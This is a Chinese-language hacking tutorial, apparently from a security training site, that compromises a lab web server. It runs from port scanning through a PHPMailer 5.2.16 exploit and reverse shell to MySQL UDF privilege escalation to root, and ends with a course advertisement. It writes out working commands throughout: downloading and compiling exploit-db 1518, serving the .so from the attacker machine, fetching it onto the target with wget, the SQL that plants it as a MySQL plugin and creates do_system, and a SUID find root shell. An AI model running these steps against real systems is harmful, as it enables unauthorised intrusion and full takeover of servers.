1、Mysql提權簡介
我們都知道網站所用腳本之間的不同權限也就大概的可以看出來,jsp 的默認權限一般都是 system 權限,而 aspx 的一般來說都高於 user 權限,一般來說。asp 和 PHP 的權限差不多,Pl ,cgi ,py 的權限一般和 Aspx 的差不多,MySQL 數據庫提權之前,也就是最重要的一點,我們要知道 root 賬號和密碼,這個也就是最重要的,因為他有寫入權限啊!!!
一般獲取 root 賬號密碼主要分為 這幾個突破口 : 數據庫配置文件、端口破解口令、下載數據庫文件獲取等
。
2、mysql實戰提權操作
1)、首先,我們如果拿到目標站,第一步可以通過masscan工具掃描目標主機的80端口,探測到存活機器,命令和數據如下:
<code>masscan 192.168.42.0/24 -p80
Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-03-11 09:17:21 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 256 hosts [1 port/host]
Discovered open port 80/tcp on 192.168.42.8/<code>
2)、接著我們就用nmap工具蒐集探測一下漏洞,這裡用到了nmap的腳本,數據和命令如下:
<code>nmap -T5 -A 192.168.42.8 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-11 17:22 CST
Nmap scan report for 192.168.42.8
Host is up (0.00059s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.42.8/<code>
3)、接著基本的操作就是我們的目錄掃描,我們這裡可以用到常見的御劍掃描工具。看看有沒有什麼敏感的信息和文件
通過目錄掃描,我們發現了目錄遍歷漏洞,根據我們黑客滲透的經驗,我們可以從中查看一些敏感的信息和重要文件,對我們後面的黑客滲透給予很大的幫助
在查看目錄的時候,通過看這個dist文件,我們得知看見目標網站是PHPMailer的程序,通過找其中的信息,發現是5.2.16版本的
那麼我們就可以在百度搜索一下相關的漏洞,也可以通過Kali Linux滲透系統這裡就通過searchsploit 工具搜索到相關漏洞的漏洞攻擊腳本
執行searchsploit 命令:searchsploit PHPMailer搜索出相關的漏洞exp
由於exp是python編寫的,我們這裡要安裝一下相關的python庫
執行命令:pip install requests-toolbelt安裝requests-toolbelt庫
4)、經過exp成功反彈拿到shell
執行命令python -c 'import pty;pty.spawn("/bin/bash")'添加python偽終端,可以看到權限為www權限,那麼這裡我們就需要去進行一方面的提權提升
通過翻php的配置文件,看到了mysql的賬號密碼
查看一下相關的啟動,發現mysql是以root啟動
我們可以打開mysql查看版本
5)、下載提權exp在kali上面,編譯在kali上編譯
執行wget https://www.exploit-db.com/download/1518 下載提權的exp代碼
接著執行gcc -g -c 1518.c
gcc -g -shared -o 1518.so 1518.o -lc
得到1518.so文件
然後在kali上創建臨時服務,執行命令python -m SimpleHTTPServer 8081開啟一個http
我們接著在靶機上執行先切換到/tmp目錄下
執行命令wget http://192.168.42.4:8081/1518.so 下載好我們剛才編譯好的exp
下載完成
下載完了我們就再次登錄數據庫執行以下命令
<code>use mysql;
create table foo(line blob);
insert into foo values(load_file('/tmp/1518.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
create function do_system returns integer soname '1518.so';
select * from mysql.func;
select do_system('chmod u+s /usr/bin/find');
find ./ -exec "/bin/sh" \\;/<code>
最後可以看見,提權成功。
為什麼選擇安界網?
安界網貫徹人才培養理念,結合專業研發團隊,打造課程內容體系,推進實訓平臺發展,通過一站式成長計劃、推薦就業以及陪護指導的師帶徒服務,為學員的繼續學習和職業發展保駕護航,真正實現和完善網絡安全精英的教練場平臺;
關注私信‘資料’
如果你想實現進高企、就高職、拿高薪,即使低學歷也可實現職業發展中的第一個“彎道超車”!安界網就是你唯一選擇,趕緊私信我!等你來!
私信回覆‘’資料‘’領取更多技術文章和學習資料,加入專屬的安全學習圈一起進步
閱讀更多 安全界 的文章
